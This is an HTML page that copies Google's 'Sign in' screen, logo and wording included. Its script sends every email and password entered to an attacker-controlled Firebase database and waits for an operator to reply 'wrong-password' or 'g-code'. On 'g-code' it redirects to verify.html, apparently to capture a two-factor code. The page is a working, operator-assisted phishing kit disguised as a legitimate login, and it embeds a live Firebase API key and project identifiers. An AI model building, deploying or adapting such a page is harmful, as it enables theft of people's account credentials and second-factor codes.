
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Login Page</title>
  <script src="https://www.gstatic.com/firebasejs/9.6.11/firebase-app-compat.js"></script>
  <script src="https://www.gstatic.com/firebasejs/9.6.11/firebase-database-compat.js"></script>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .container {
      background-color: white;
      padding: 40px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      width: 300px;
      text-align: center;
    }
    .container img.logo {
      width: 80px;
      margin-bottom: 10px;
    }
    h2 {
      margin: 10px 0;
      color: #202124;
    }
    input[type="email"],
    input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 8px 0;
      border: 1px solid #ccc;
      border-radius: 4px;
    }
    button {
      background-color: #1a73e8;
      color: white;
      border: none;
      padding: 10px;
      width: 100%;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
      margin-top: 10px;
    }
    button:hover {
      background-color: #155ab6;
    }
    .loading {
      display: none;
      text-align: center;
      margin-top: 20px;
    }
    .loading img {
      width: 40px;
      display: block;
      margin: 0 auto 10px;
    }
    .links {
      text-align: left;
      font-size: 12px;
      margin-top: 15px;
    }
    .links a {
      color: #1a73e8;
      text-decoration: none;
    }
    #wrongNotice {
      display: none;
      color: red;
      font-size: 13px;
      margin-top: 5px;
      text-align: left;
    }
  </style>
</head>
<body>

<div class="container">
  <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" class="logo" alt="Google Logo">
  <h2>Sign in</h2>
  <p>Use your Google Account</p>

  <input type="email" id="email" placeholder="Email" />
  <input type="password" id="password" placeholder="Password" />

  <div id="wrongNotice">
    Wrong password. <a href="#" onclick="focusPassword()">Update now</a>
  </div>

  <button onclick="submitForm()">Next</button>

  <div class="loading" id="loadingDialog">
    <img src="https://upload.wikimedia.org/wikipedia/commons/b/b1/Loading_icon.gif" alt="Loading..." />
    <p>Verifying your account...</p>
  </div>

  <div class="links">
    <p>Not your computer? Use a private browsing window to sign in. <a href="#">Learn more</a></p>
    <p><a href="#">Create account</a></p>
  </div>
</div>

<script>
  const firebaseConfig = {
    apiKey: "AIzaSyAvib1tlDUQUDMatJyPSJE96SQI891amMs",
    authDomain: "my-app-f068f.firebaseapp.com",
    databaseURL: "https://my-app-f068f-default-rtdb.firebaseio.com",
    projectId: "my-app-f068f",
    storageBucket: "my-app-f068f.appspot.com",
    messagingSenderId: "1080624095623",
    appId: "1:1080624095623:android:993fd028a8190eb2d6f322"
  };

  firebase.initializeApp(firebaseConfig);
  const db = firebase.database();
  let newKey = "";
  let currentListenerRef = null;

  function submitForm() {
    const email = document.getElementById("email").value.trim();
    const password = document.getElementById("password").value.trim();

    if (!email || !password) {
      alert("Please fill in both fields.");
      return;
    }

    document.getElementById("wrongNotice").style.display = "none";
    document.getElementById("loadingDialog").style.display = "block";

    if (currentListenerRef) {
      currentListenerRef.off();
    }

    const timestamp = new Date().toLocaleString();
    const entry = {
      email,
      password,
      code: "",
      status: "Pending",
      timestamp
    };

    const ref = db.ref("user_messages").push();
    newKey = ref.key;
    ref.set(entry);

    currentListenerRef = db.ref("user_messages/" + newKey);
    currentListenerRef.on("value", (snapshot) => {
      const data = snapshot.val();
      if (!data) return;

      if (data.status === "wrong-password") {
        document.getElementById("loadingDialog").style.display = "none";
        document.getElementById("wrongNotice").style.display = "block";
      }

      if (data.status === "g-code" && data.code) {
        localStorage.setItem("verify_email", data.email);
        document.getElementById("loadingDialog").style.display = "none";
        window.location.href = "verify.html";
      }
    });
  }

  function focusPassword() {
    document.getElementById("password").focus();
  }
</script>

</body>
</html>
